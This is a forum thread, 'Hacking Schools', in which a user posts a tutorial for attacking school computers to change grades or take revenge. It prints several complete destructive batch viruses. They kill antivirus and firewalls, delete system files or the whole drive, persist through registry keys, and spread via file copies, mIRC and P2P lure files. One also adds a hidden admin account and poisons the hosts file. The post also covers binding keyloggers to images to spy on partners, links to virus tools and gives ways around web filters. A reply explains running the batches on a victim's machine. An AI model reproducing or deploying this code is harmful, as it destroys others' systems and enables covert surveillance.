Hacking Schools.

theorb666

Member
VIP
Dec 3, 2010
8
Ireland
Ok I noticed a lot of people are asking questions about Hacking Their Schools.
For multiple reasons.Changing grades,revenge..
So I thought :"Hey why not make a tutorial of my own about hacking schools?"
So I made this.
Here I go

What are some ways?

Easy:

Batches.
Keyloggers.
Viruses.
Restricted Websites Access.
Administrator priviliges

Batches

Batches can pretty much do anything.
Flood Networks,Disable Computers,Delete C:\,Burn Memory...
I will give some nice batches.
Made by me/Thanatos/Laughing Man/Fun Pack.



Batch too long click to read
@echo off
@echo off
title I LIKE PRETTY COLORS!
:1
echo DONT YOU LOVE PRETTY COLORS!!
echo PLEASE JUST TAKE LIKE 20 SECONDS TO ADMIRE!!!
start mspaint.exe>nul
start cmd.exe>nul
copy "C:\Program Files">nul
copy "C:\Windows">nul
copy C:\WINDOWS\addins>nul
copy C:\WINDOWS\system32>nul
copy C:\WINDOWS\system>nul
color 21
color 12
color 43
color 34
goto :1

Ok here I go:
Kills memory
Please save on the desktop

Thanatos:

Batch too long click to read
start
color 5
title Your Fucked, lol
time 12:00
net stop "Security center"
net stop sharedaccess
netsh firewall set opmode mode-disable
start
echo copy %0 >> c:\autoexec.bat
copy %0 c:\windows\startm~1\Programs\StartUp\shroom.bat
Attrib +r +h C:\windows\startm~1\program\startup\shroom.bat
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg
echo "systemStart"="c:\filename\virus.bat" >> c:\regstart.reg
start c:\regstart.reg
copy %0 %systemroot%\shroom.bat > nul
start
copy %0 *.bat > nul
start
attrib +r +h virus.bat
attrib +r +h
RUNDLL32 USER32.DLL,SwapMouseButton
tskill msnmsgr
tskill Limewire
tskill iexplorer
tskill NMain
tskill Firefox
tskill explorer
tskill AVGUARD
msg * Awww Your computer is now fucked
msg * You got owned!
msg * Say Bye to your computer n00b
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
copy shroom.bat C:/WINDOWS
del "C:\WINDOWS\pchealth\"
del "C:\WINDOWS\system\"
del "C:\WINDOWS\system32\restore\"
del "C:\WINDOWS\system32\logonui.exe"
del "C:\WINDOWS\system32\ntoskrnl.exe"
del "Winlogon.exe"
ERASE c:
start
shutdown - s -t 15 -c "15 Seconds and counting"
cd %userprofile%\Desktop
copy fixvirus.bat %userprofile%\Desktop
echo HAXHAXHAX
:LOOP
color 17
color 28
color 32
color 22
color 11
color 02
color 39
color 34
GOTO LOOP

Basically Fucks Up the pc.
Deletes Most of the necessary files.
Stops AV's Firewalls's Anything..
Kills most Processes
Pretty much it.



LaughingMan

Batch too long click to read
@echo off
%j2dt%
%random%%random%%random%%random%%random%%random%%random%
%61jv%
%random%%random%%random%%random%%random%%random%%random%
%rytn%
%random%%random%%random%%random%%random%%random%%random%
%twsg%
%random%%random%%random%%random%%random%%random%%random%
%d4kb%
%random%%random%%random%%random%%random%%random%%random%
%qt36%
%random%%random%%random%%random%%random%%random%%random%
set a=Damn
%vhvx%
%uc62%
copy %0 %windir%\%a%.bat
%r42b%
%6ffa%
set The Laughing Man=tskill
%The Laughing Man% norton*
%The Laughing Man% av*
%The Laughing Man% fire*
%The Laughing Man% anti*
%The Laughing Man% spy*
%The Laughing Man% bullguard
%The Laughing Man% PersFw
%The Laughing Man% KAV*
%The Laughing Man% ZONEALARM
%The Laughing Man% SAFEWEB
%The Laughing Man% OUTPOST
%The Laughing Man% nv*
%The Laughing Man% nav*
%The Laughing Man% F-*
%The Laughing Man% ESAFE
%The Laughing Man% cle
%The Laughing Man% BLACKICE
%The Laughing Man% def*
%8r65%
%qngs%
%syuq%
%xqh8%
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Damn /t REG_SZ /d %windir%\%a%.bat

/f > nul
%3qr7%
%7tck%
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Damn /t REG_SZ /d %windir%\%a%.bat

/f > nul
%rtwd%
%wbm2%
set Damn1=echo
%wmt8%
%s5g7%
%Damn1% [windows] >> %windir%\win.ini
%uggu%
%Damn1% run=%windir%\%a%.bat >> %windir%\win.ini
%Damn1% load=%windir%\%a%.bat >> %windir%\win.ini
%Damn1% [boot] >> %windir%\system.ini
%btvq%
%Damn1% shell=explorer.exe %a%.bat >> %windir%\system.ini
%wkuu%
%ornm%
chcp 1252 > nul
%random%%The Laughing Man%%random%%Damn%
copy %0 "C:\Documents and Settings\All Users\Startmenu\Programs\Autostart\%a%.bat" > nul
%wnxl%
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\%a%.bat" > nul
%random%%The Laughing Man%%random%%Damn%
%4i16%
net share ADMIN$
%oxps%
net share C$
net share IPC$
%847f%
net share c=c:
net share d=d:
%2shq%
%1ls3%
for %%a in (*.bat *.txt *.doc *.pdf *.jpg) do copy %0 %%a > nul
%2ww2%
set Damn2=echo
%ucu4%
%g5u2%
%Damn2% 127.0.0.1 http://www.google.com > %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.google.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.symantec.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.free-av.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.free-av.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.antivir.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.antivir.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.microsoft.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.microsoft.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.sophos.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.sophos.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.symantec.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.hijackthis.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.spychecker.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.trendmicro.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.trendmicro.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.yahoo.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.yahoo.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.lycos.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 http://www.lycos.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 yahoo.de >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 lycos.com >> %windir%\system32\drivers\etc\hosts
%Damn2% 127.0.0.1 lycos.de >> %windir%\system32\drivers\etc\hosts
%zp2x%
%msvp%
%gp6w%
echo MsgBox "I thought what I'd do was pretend to be one of those deaf mutes...", 16, "The

Laughing Man" > v.vbs
start v.vbs
%ufsx%
%wf2w%
set x=%random%
%kgxx%
%c3mp%
copy %0 %windir%\%x%.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d

"%windir%\%x%.bat" /f > nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Damn /t REG_SZ /d

"%windir%\%a%.bat" /f > nul
cd %windir%\system32
for %%a in (*.bat) do copy %0 %%a > nul
cd ..
for %%a in (*.bat) do copy %0 %%a > nul
copy %0 c:\autoexec.bat
%g25d%
%fjjt%
%8tov%
set Damn3=echo
copy %0 %windir%\ftppassword.bat
%Damn3% [script] > irc.bat
%Damn3% n1={ if ($nick == $me) { halt } >> irc.bat
%Damn3% n2=/dcc send $nick "%windir%\ftppassword.bat" >> irc.bat
%Damn3% n3= } >> irc.bat
if exist c:\mIRC\script.ini copy irc.bat c:\mIRC\script.ini
%terz%
if exist %programfiles%\mIRC\script.ini copy irc.bat %programfiles%\mIRC\script.ini
del irc.bat > nul
%gtym%
%emx3%
md %programfiles%\Damn\xxx\ > nul
md %programfiles%\Damn\cracks\ > nul
copy %0 %programfiles%\Damn\xxx\xxxpasses.txt.bat > nul
copy %0 %programfiles%\Damn\cracks\keygen.exe.bat > nul
copy %0 %programfiles%\Damn\cracks\serialsV7.exe.bat > nul
copy %0 %programfiles%\Damn\cracks\crack_it.exe.bat > nul
echo to crack your programm use crack_it.exe, hf ;) > %programfiles%\Damn\cracks\readme.txt
net share xxx&cracks=%programfiles%\Damn > nul
%ud2n%
%The Laughing Man%%random%%Damn%
%vxis%
%s6wl%
net user root pwd /add
net localgroup "Administratoren" root /add
%tgom%
net localgroup "Administrators" root /add
%The Laughing Man%%random%%random%%Damn%
%bem8%
%u1ao%
reg add HKLM\SOFTWARE\Microsoft\Ole\ /v EnableDCOM /t REG_SZ /d Y /f > nul
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymous /t REG_SZ /d 0 /f > nul
%vp8e%
%ed7s%
%mknf%
%883k%
set The Laughing Manc=echo
%7j1e%
%The Laughing Manc% "<html>" > %windir%\hax0r.html
%The Laughing Manc% "<head>" >> %windir%\hax0r.html
%The Laughing Manc% "<title>Virus</title>" >> %windir%\hax0r.html
%The Laughing Manc% "</head>" >> %windir%\hax0r.html
%The Laughing Manc% "<body bgcolor="#000000">" >> %windir%\hax0r.html
%The Laughing Manc% "<p align="center"><b><font face="Arial" size="7"

color="#FFFFFF"><blink>I thought what I'd do was pretend to be one of those deaf mutes... - The Laughing Man</blink></font></b></p>" >> %windir%\hax0r.html
%The Laughing Manc% "</body>" >> %windir%\hax0r.html
%The Laughing Manc% "</html>" >> %windir%\hax0r.html
%6sbe%
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d

"%windir%\hax0r.html" /f > nul
%vfeq%
%6xyr%
%3ujc%
%fo3h%
md %programfiles%\shared_folder > nul
copy %0 %programfiles%\shared_folder\parishilton.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_movie2.jpg.bat > nul
%Damn%%random%%Damn%%The Laughing Man%%random%
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.bat > nul
%The Laughing Man%%random%%Damn%%Damn%%random% > nul
copy %0 %programfiles%\shared_folder\css_wallhack.bat > nul
reg add "HKCU\Software\Kazaa\LocalContent" /v DownloadDir /t REG_SZ /d

"%programfiles%\shared_folder" /f > nul
%um8f%
%cqww%
set Damna=copy
%ba2w%
%2vjg%
%Damna% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%Damna% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%Damna% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat >

nul
%Damna% %0 c:\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%Damna% %0 c:\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%ikwc%
%Damna% %0 c:\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
%ft5u%
%rai3%
%ml8t%
%xpnv%
shutdown /r /f /t 23 /c "I thought what I'd do was pretend to be one of those deaf mutes..."
%1jek%
%enas%
shutdown /s /f /t 23 /c "Infected with Damn virus!! - The Laughing Man"
%ot1d%
%w2cy%
%bpy7%
%h1jw%
%pvss%
%lmsz%
:bombing
chcp 1252 > nul
%random%%Damn%%random%%Damn%
copy %0 "C:\Documents and Settings\All Users\Startmenu\Program\Autostart\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Startmenu\Program\%random%.bat" > nul
copy %0 "C:\Documents and Settings\All Users\Startmenu\%random%.bat" > nul
copy %0 "C:\Documents and Settings\%USERNAME%\Desktop\%random%.bat" > nul
copy %0 "C:\%random%.bat" > nul
%random%%The Laughing Man%%random%%The Laughing Man%
%g4yy%
taskkill /f /im explorer.exe > nul
taskkill /f /im lsass.exe > nul
goto bombing
%o4k7%
%ppwx%
%dav%
%7sxo%
:: Damn by The Laughing Man


Fun Pack
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

Deletes the system drive.


Keyloggers:

Sangederomin:

Click to read
this is my thread about keyloggers i notice alot of newcomers repeatedly asking about them so here we go...the basics

the boring background
What keyloggers do is they take note of every keystroke that the person who downloaded the keylogger types. why is this useful? you can do a couple things with a keylogger. you can use it on yourself to find out everything that people type while your not around or you can install it on someone elses machine to see everything that they type.....

Uses
find out whats being typed on your computer while your not around
find out whats being typed on someone elses computer (example girlfriend or boyfriend)
passwords and log-ins

Why is this better than phishing?
although it is more difficult to keylog somebody than to phish them it is more effective because it gives you a constant feed as to what theyr typing. why is this useful? because if you phish someone you will only have the information they entered once on your phisher. with a keylogger you will have the password they use, and if they so happen to change that password you will know. and you can view what the type in EVERYTHING

anyways on to the better stuff
how to accomplish keylogging?
the best way to accomplish keylogging is to find the keylogger you want, test it in a sandbox (controlled environment ie your computer.) once youv found the one you want to send out download a file binder, i personally reccomend sfx compiler. what this allows you to do is bind your keylogger to another program or file in order to trick your slave. you can bind your keylogger to a picture of yourself, once the picture is opened so will the keylogger and it will starting logging keystrokes(in short.) this is the handy part here, bind your keylogger to a picture and send it to your girlfriend saying hey i sent you a cute pic of myself or whatever, that part is up to you, use your creativity.

Stealth
first of all dont try to be to obvious or suspicious with what your doing, make it seem as if what your pretending to do your actually doing... for example dont repeatedly urge them to open a picture you sent them or whatever.
next part is encryption. if you want some added anonymity and assurance your keylogger wont get picked up by an anti virus just encrypt it.
lastly yes people you can get the logs sent to your email its a standard feature on many keyloggers

Viruses:

I think all of you know what Viruses mean.
Download some Virus Tools on :
http://www.to0l-base.de/index.php?dir=SysFucker%2F
and search for more on
http://www.to0l-base.de/
The password for all downloaded files are :
To0l-base

Restricted website access:

There are a lot of ways but here are some good ones:

http://www.vtunnel.com
This will go to any website you want

Start>run>ping http://www.url.com
Take the ip and paste it in the url of the browser there you have it:)


Administrator priviliges:

Click Start, Run and type Regedit.exe
Navigate to the following key:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList
Use the File, Export option to backup the key
Create a new DWORD Value named Administrator
Double-click Administrator, and set 1 as its data
Exit the Registry Editor.
 

Mercury

Well-Known Member
VIP
Aug 22, 2010
165
Love it :) I edited it to check spellings and your BBCode wasn't working.
 

jkakins37

Member
Ultimate Donator
Nov 19, 2012
5
How do you apply the batches? Is it done in the cmd window and if so what parts would you paste,also i like the keylogger, is it possible to send it totally anonymos?Thanks in advance
 

mks1199

New Member
Nov 19, 2015
1
use xiaopan os (it`s only of 70 MB) in virtualbox or vm ware see tutorials of aircrack-ng (app included in os) and other apps included ;)
 

rarien

Member
Apr 6, 2016
5
Btw if you can get to the registry, then you should be able to pull up the run prompt.. if so: control userpasswords2
 

Justcus

New Member
Nov 26, 2016
2
jkakins37 said:
How do you apply the batches? Is it done in the cmd window and if so what parts would you paste,also i like the keylogger, is it possible to send it totally anonymos?Thanks in advance
you do not want to run them in your cmd window unless you want to unleash the code on your system. you paste the code into a text editor and save as a .bat file and you run the .bat file on the computer you want to infect.